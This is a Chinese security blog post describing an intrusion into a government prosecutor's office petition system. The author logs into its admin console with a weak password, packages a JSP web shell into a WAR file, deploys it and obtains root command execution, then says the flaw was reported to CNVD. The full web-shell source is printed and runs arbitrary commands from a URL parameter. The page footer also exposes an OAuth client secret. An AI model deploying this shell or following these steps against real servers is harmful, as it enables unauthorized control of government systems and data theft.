<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>记一次zf的实战😀 | Fre3L3i's blogs</title><meta name="description" content="记一次zf的实战😀"><meta name="keywords" content="实战,zf"><meta name="author" content="Fre3L3i"><meta name="copyright" content="Fre3L3i"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="canonical" href="http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="记一次zf的实战😀"><meta name="twitter:description" content="记一次zf的实战😀"><meta name="twitter:image" content="http://fre3l3i.github.io/img/hack4.jpg"><meta property="og:type" content="article"><meta property="og:title" content="记一次zf的实战😀"><meta property="og:url" content="http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/"><meta property="og:site_name" content="Fre3L3i's blogs"><meta property="og:description" content="记一次zf的实战😀"><meta property="og:image" content="http://fre3l3i.github.io/img/hack4.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="prev" title="记zf实战后提交cnvd后续" href="http://fre3l3i.github.io/2019/10/06/记zf实战后提交cnvd后续/"><link rel="next" title="Hello World" href="http://fre3l3i.github.io/2019/09/13/hello-world/"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/gitalk/dist/gitalk.min.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.js"></script><script src="https://cdn.jsdelivr.net/npm/blueimp-md5@2.10.0/js/md5.min.js"></script><link rel="dns-prefetch" href="https://hm.baidu.com"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?63e637c26e8dfc25455d99703b911772";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  highlight_copy: 'true',
  highlight_lang: 'true',
  highlight_shrink: 'false',
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: '添加书签',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天'

  
}</script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#记一次zf的实战😀"><span class="toc-number">1.</span> <span class="toc-text">记一次zf的实战😀</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#记一次某人民检察院远程接访系统漏洞后台getshell"><span class="toc-number">1.0.1.</span> <span class="toc-text">记一次某人民检察院远程接访系统漏洞后台getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#找到后台管理控制台后-尝试用弱口令进入"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">找到后台管理控制台后(尝试用弱口令进入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#弱口令登录后"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">弱口令登录后</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#找到发布应用程序"><span class="toc-number">1.0.1.3.</span> <span class="toc-text">找到发布应用程序</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#准备jsp-shell-并保存为zpojerjv-jsp"><span class="toc-number">1.0.1.4.</span> <span class="toc-text">准备jsp shell 并保存为zpojerjv.jsp</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#准备WEB-INF中的xml文件用来解析jsp木马-把xml文件命名为web-xml并放入WEB-INF文件夹中"><span class="toc-number">1.0.1.5.</span> <span class="toc-text">准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#如下图桌面上的一个文件夹一个文件"><span class="toc-number">1.0.1.6.</span> <span class="toc-text">如下图桌面上的一个文件夹一个文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#完成后将两个文件打包成zip格式"><span class="toc-number">1.0.1.7.</span> <span class="toc-text">完成后将两个文件打包成zip格式</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#打包操作如下所示"><span class="toc-number">1.0.1.8.</span> <span class="toc-text">打包操作如下所示</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#成功后如下所示，在桌面中会出现shell-zip的压缩包"><span class="toc-number">1.0.1.9.</span> <span class="toc-text">成功后如下所示，在桌面中会出现shell.zip的压缩包</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#把压缩包改名为war格式后缀"><span class="toc-number">1.0.1.10.</span> <span class="toc-text">把压缩包改名为war格式后缀</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#修改好后上传至发布应用程序"><span class="toc-number">1.0.1.11.</span> <span class="toc-text">修改好后上传至发布应用程序</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#上传成功后能看到下图消息"><span class="toc-number">1.0.1.12.</span> <span class="toc-text">上传成功后能看到下图消息</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#点击应用程序列表发现shell-war状态已启动"><span class="toc-number">1.0.1.13.</span> <span class="toc-text">点击应用程序列表发现shell.war状态已启动</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#最后点击访问"><span class="toc-number">1.0.1.14.</span> <span class="toc-text">最后点击访问</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#输入命令whoami-能获取到的权限为root权限"><span class="toc-number">1.0.1.15.</span> <span class="toc-text">输入命令whoami 能获取到的权限为root权限</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#漏洞利用完毕-此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。"><span class="toc-number">1.0.1.16.</span> <span class="toc-text">漏洞利用完毕,此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。</span></a></li></ol></li></ol></li></ol></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/hack4.jpg)"><div id="page-header"><span class="pull-left"> <a class="blog_title" id="site-name" href="/">Fre3L3i's blogs</a></span><div class="open toggle-menu pull-right"><div class="menu-icon-first"></div><div class="menu-icon-second"></div><div class="menu-icon-third"></div></div><div class="menu_mask"></div><span class="pull-right menus"><div class="mobile_author_icon"><img class="lozad avatar_img" src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'"></div><div class="mobile_post_data"><div class="mobile_data_item text-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">8</div></a></div></div><div class="mobile_data_item text-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">4</div></a></div></div><div class="mobile_data_item text-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">2</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 家</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div><script>document.body.addEventListener('touchstart', function(){ });</script></div></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title"><div class="posttitle">记一次zf的实战😀</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-09-16<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2019-09-16</time><span class="post-meta__separator mobile_hidden">|</span><span class="mobile_hidden"><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/实战/">实战</a></span><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">455</span><span class="post-meta__separator">|</span><span>阅读时长: 2 分钟</span><span class="post-meta__separator">|</span><span>阅读量: </span><span id="busuanzi_value_page_pv"></span></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="记一次zf的实战😀"><a href="#记一次zf的实战😀" class="headerlink" title="记一次zf的实战😀"></a>记一次zf的实战😀</h1><h3 id="记一次某人民检察院远程接访系统漏洞后台getshell"><a href="#记一次某人民检察院远程接访系统漏洞后台getshell" class="headerlink" title="记一次某人民检察院远程接访系统漏洞后台getshell"></a>记一次某人民检察院远程接访系统漏洞后台getshell</h3><p><img alt data-src="img.png" class="lozad"></p>
<ul>
<li><h4 id="找到后台管理控制台后-尝试用弱口令进入"><a href="#找到后台管理控制台后-尝试用弱口令进入" class="headerlink" title="找到后台管理控制台后(尝试用弱口令进入)"></a>找到后台管理控制台后(尝试用弱口令进入)</h4></li>
</ul>
<p><img alt data-src="img1.png" class="lozad"></p>
<ul>
<li><h4 id="弱口令登录后"><a href="#弱口令登录后" class="headerlink" title="弱口令登录后"></a>弱口令登录后</h4></li>
</ul>
<p><img alt data-src="img2.png" class="lozad"></p>
<ul>
<li><h4 id="找到发布应用程序"><a href="#找到发布应用程序" class="headerlink" title="找到发布应用程序"></a>找到发布应用程序</h4></li>
</ul>
<p><img alt data-src="img3.png" class="lozad"></p>
<ul>
<li><h4 id="准备jsp-shell-并保存为zpojerjv-jsp"><a href="#准备jsp-shell-并保存为zpojerjv-jsp" class="headerlink" title="准备jsp shell 并保存为zpojerjv.jsp"></a>准备jsp shell 并保存为zpojerjv.jsp</h4></li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;%@ page import=&quot;java.util.*,java.io.*&quot;%&gt;</span><br><span class="line">&lt;%</span><br><span class="line">%&gt;</span><br><span class="line">&lt;HTML&gt;&lt;BODY&gt;</span><br><span class="line">&lt;FORM METHOD=&quot;GET&quot; NAME=&quot;myform&quot; ACTION=&quot;&quot;&gt;</span><br><span class="line">&lt;INPUT TYPE=&quot;text&quot; NAME=&quot;cmd&quot;&gt;</span><br><span class="line">&lt;INPUT TYPE=&quot;submit&quot; VALUE=&quot;Send&quot;&gt;</span><br><span class="line">&lt;/FORM&gt;</span><br><span class="line">&lt;pre&gt;</span><br><span class="line">&lt;%</span><br><span class="line">if (request.getParameter(&quot;cmd&quot;) != null) &#123;</span><br><span class="line">out.println(&quot;Command: &quot; + request.getParameter(&quot;cmd&quot;) + &quot;&lt;BR&gt;&quot;);</span><br><span class="line">Process p = Runtime.getRuntime().exec(request.getParameter(&quot;cmd&quot;));</span><br><span class="line">OutputStream os = p.getOutputStream();</span><br><span class="line">InputStream in = p.getInputStream();</span><br><span class="line">DataInputStream dis = new DataInputStream(in);</span><br><span class="line">String disr = dis.readLine();</span><br><span class="line">while ( disr != null ) &#123;</span><br><span class="line">out.println(disr); </span><br><span class="line">disr = dis.readLine(); </span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br><span class="line">&lt;/pre&gt;</span><br><span class="line">&lt;/BODY&gt;&lt;/HTML&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li><h4 id="准备WEB-INF中的xml文件用来解析jsp木马-把xml文件命名为web-xml并放入WEB-INF文件夹中"><a href="#准备WEB-INF中的xml文件用来解析jsp木马-把xml文件命名为web-xml并放入WEB-INF文件夹中" class="headerlink" title="准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)"></a>准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)</h4></li>
</ul>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE web-app PUBLIC</span></span><br><span class="line"><span class="meta">"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"</span></span><br><span class="line"><span class="meta">"http://java.sun.com/dtd/web-app_2_3.dtd"&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">web-app</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">welcome-file-list</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">welcome-file</span>&gt;</span>zpojerjv.jsp<span class="tag">&lt;/<span class="name">welcome-file</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">welcome-file-list</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">web-app</span>&gt;</span></span><br></pre></td></tr></table></figure>
<ul>
<li><h4 id="如下图桌面上的一个文件夹一个文件"><a href="#如下图桌面上的一个文件夹一个文件" class="headerlink" title="如下图桌面上的一个文件夹一个文件"></a>如下图桌面上的一个文件夹一个文件</h4><img alt data-src="img4.png" class="lozad"></li>
</ul>
<p><img alt data-src="img5.png" class="lozad"></p>
<ul>
<li><h4 id="完成后将两个文件打包成zip格式"><a href="#完成后将两个文件打包成zip格式" class="headerlink" title="完成后将两个文件打包成zip格式"></a>完成后将两个文件打包成zip格式</h4></li>
</ul>
<p><img alt data-src="img6.png" class="lozad"></p>
<ul>
<li><h4 id="打包操作如下所示"><a href="#打包操作如下所示" class="headerlink" title="打包操作如下所示"></a>打包操作如下所示</h4></li>
</ul>
<p><img alt data-src="img7.png" class="lozad"></p>
<ul>
<li><h4 id="成功后如下所示，在桌面中会出现shell-zip的压缩包"><a href="#成功后如下所示，在桌面中会出现shell-zip的压缩包" class="headerlink" title="成功后如下所示，在桌面中会出现shell.zip的压缩包"></a>成功后如下所示，在桌面中会出现shell.zip的压缩包</h4></li>
</ul>
<p><img alt data-src="img8.png" class="lozad"></p>
<ul>
<li><h4 id="把压缩包改名为war格式后缀"><a href="#把压缩包改名为war格式后缀" class="headerlink" title="把压缩包改名为war格式后缀"></a>把压缩包改名为war格式后缀</h4></li>
</ul>
<p><img alt data-src="img9.png" class="lozad"></p>
<ul>
<li><h4 id="修改好后上传至发布应用程序"><a href="#修改好后上传至发布应用程序" class="headerlink" title="修改好后上传至发布应用程序"></a>修改好后上传至发布应用程序</h4></li>
</ul>
<p><img alt data-src="img10.png" class="lozad"></p>
<ul>
<li><h4 id="上传成功后能看到下图消息"><a href="#上传成功后能看到下图消息" class="headerlink" title="上传成功后能看到下图消息"></a>上传成功后能看到下图消息</h4></li>
</ul>
<p><img alt data-src="img11.png" class="lozad"></p>
<ul>
<li><h4 id="点击应用程序列表发现shell-war状态已启动"><a href="#点击应用程序列表发现shell-war状态已启动" class="headerlink" title="点击应用程序列表发现shell.war状态已启动"></a>点击应用程序列表发现shell.war状态已启动</h4></li>
</ul>
<p><img alt data-src="img12.png" class="lozad"></p>
<ul>
<li><h4 id="最后点击访问"><a href="#最后点击访问" class="headerlink" title="最后点击访问"></a>最后点击访问</h4></li>
</ul>
<p><img alt data-src="img13.png" class="lozad"></p>
<ul>
<li><h4 id="输入命令whoami-能获取到的权限为root权限"><a href="#输入命令whoami-能获取到的权限为root权限" class="headerlink" title="输入命令whoami 能获取到的权限为root权限"></a>输入命令whoami 能获取到的权限为root权限</h4></li>
</ul>
<p><img alt data-src="img14.png" class="lozad"></p>
<ul>
<li><h4 id="漏洞利用完毕-此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。"><a href="#漏洞利用完毕-此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。" class="headerlink" title="漏洞利用完毕,此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。"></a>漏洞利用完毕,此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。</h4></li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Fre3L3i</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/">http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://fre3l3i.github.io">Fre3L3i's blogs</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/实战/">实战    </a><a class="post-meta__tags" href="/tags/zf/">zf    </a></div><div class="post_share"><div class="social-share" data-image="/img/hack4.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></div><nav class="pagination_post" id="pagination"><div class="prev-post pull-left"><a href="/2019/10/06/记zf实战后提交cnvd后续/"><img class="prev_cover lozad" data-src="/img/Alaley3.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>记zf实战后提交cnvd后续</span></div></a></div><div class="next-post pull-right"><a href="/2019/09/13/hello-world/"><img class="next_cover lozad" data-src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>Hello World</span></div></a></div></nav><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div id="gitalk-container"></div><script>var gitalk = new Gitalk({
  clientID: 'cfe0c9d33c3542fc0879',
  clientSecret: '6dd55af884321e6cf38cbb42b1954b9fda93d256',
  repo: 'Fre3L3i.github.io',
  owner: 'Fre3L3i',
  admin: 'Fre3L3i',
  id: md5(decodeURI(location.pathname)),
  language: ''
})
gitalk.render('gitalk-container')</script></div></div></div><footer><div id="footer"><div class="copyright">&copy;2018 - 2019 By Fre3L3i</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="footer_custom_text">Power By Fre3L3i</div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><section class="rightside" id="rightside"><a id="to_comment" href="#post-comment"><i class="scroll_to_comment fa fa-comments"></i></a><i class="fa fa-book" id="readmode" title="阅读模式"> </i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换">繁</a><i class="nightshift fa fa-moon-o" id="nightshift" title="夜间模式"></i></section><div class=" " id="post_bottom"><div id="post_bottom_items"><a id="mobile_to_comment" href="#post-comment"><i class="mobile_scroll_to_comment fa fa-comments"></i></a><i class="fa fa-list" id="mobile_toc"></i><div id="toc_mobile"><div class="toc_mobile_headline">目录</div><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#记一次zf的实战😀"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">记一次zf的实战😀</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#记一次某人民检察院远程接访系统漏洞后台getshell"><span class="toc_mobile_items-number">1.0.1.</span> <span class="toc_mobile_items-text">记一次某人民检察院远程接访系统漏洞后台getshell</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#找到后台管理控制台后-尝试用弱口令进入"><span class="toc_mobile_items-number">1.0.1.1.</span> <span class="toc_mobile_items-text">找到后台管理控制台后(尝试用弱口令进入)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#弱口令登录后"><span class="toc_mobile_items-number">1.0.1.2.</span> <span class="toc_mobile_items-text">弱口令登录后</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#找到发布应用程序"><span class="toc_mobile_items-number">1.0.1.3.</span> <span class="toc_mobile_items-text">找到发布应用程序</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#准备jsp-shell-并保存为zpojerjv-jsp"><span class="toc_mobile_items-number">1.0.1.4.</span> <span class="toc_mobile_items-text">准备jsp shell 并保存为zpojerjv.jsp</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#准备WEB-INF中的xml文件用来解析jsp木马-把xml文件命名为web-xml并放入WEB-INF文件夹中"><span class="toc_mobile_items-number">1.0.1.5.</span> <span class="toc_mobile_items-text">准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#如下图桌面上的一个文件夹一个文件"><span class="toc_mobile_items-number">1.0.1.6.</span> <span class="toc_mobile_items-text">如下图桌面上的一个文件夹一个文件</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#完成后将两个文件打包成zip格式"><span class="toc_mobile_items-number">1.0.1.7.</span> <span class="toc_mobile_items-text">完成后将两个文件打包成zip格式</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#打包操作如下所示"><span class="toc_mobile_items-number">1.0.1.8.</span> <span class="toc_mobile_items-text">打包操作如下所示</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#成功后如下所示，在桌面中会出现shell-zip的压缩包"><span class="toc_mobile_items-number">1.0.1.9.</span> <span class="toc_mobile_items-text">成功后如下所示，在桌面中会出现shell.zip的压缩包</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#把压缩包改名为war格式后缀"><span class="toc_mobile_items-number">1.0.1.10.</span> <span class="toc_mobile_items-text">把压缩包改名为war格式后缀</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#修改好后上传至发布应用程序"><span class="toc_mobile_items-number">1.0.1.11.</span> <span class="toc_mobile_items-text">修改好后上传至发布应用程序</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#上传成功后能看到下图消息"><span class="toc_mobile_items-number">1.0.1.12.</span> <span class="toc_mobile_items-text">上传成功后能看到下图消息</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#点击应用程序列表发现shell-war状态已启动"><span class="toc_mobile_items-number">1.0.1.13.</span> <span class="toc_mobile_items-text">点击应用程序列表发现shell.war状态已启动</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#最后点击访问"><span class="toc_mobile_items-number">1.0.1.14.</span> <span class="toc_mobile_items-text">最后点击访问</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#输入命令whoami-能获取到的权限为root权限"><span class="toc_mobile_items-number">1.0.1.15.</span> <span class="toc_mobile_items-text">输入命令whoami 能获取到的权限为root权限</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#漏洞利用完毕-此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。"><span class="toc_mobile_items-number">1.0.1.16.</span> <span class="toc_mobile_items-text">漏洞利用完毕,此服务器可做内网穿透，漏洞危害较大，已提交至CNVD望厂商重视。</span></a></li></ol></li></ol></li></ol></div></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/js-cookie@2/src/js.cookie.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script>$(function () {
  $('span.katex-display').wrap('<div class="katex-wrap"></div>')
})</script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="/js/third-party/fireworks.js"></script><script src="/js/nightshift.js"></script><script id="ribbon" src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/js/piao.js"></script><script color="0,0,255" opacity="0.7" zindex="-1" count="99" src="https://cdn.jsdelivr.net/gh/jerryc127/CDN/js/canvas-nest.js"></script><script src="/js/activate-power-mode.js"></script><script>POWERMODE.colorful = true; // make power mode colorful
POWERMODE.shake = true; // turn off shake
document.body.addEventListener('input', POWERMODE);
</script><script src="/js/tw_cn.js"></script><script>translateInitilization()

</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@1.2.2/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script><script>const observer = lozad(); // lazy loads elements with default selector as '.lozad'
observer.observe();</script></body></html>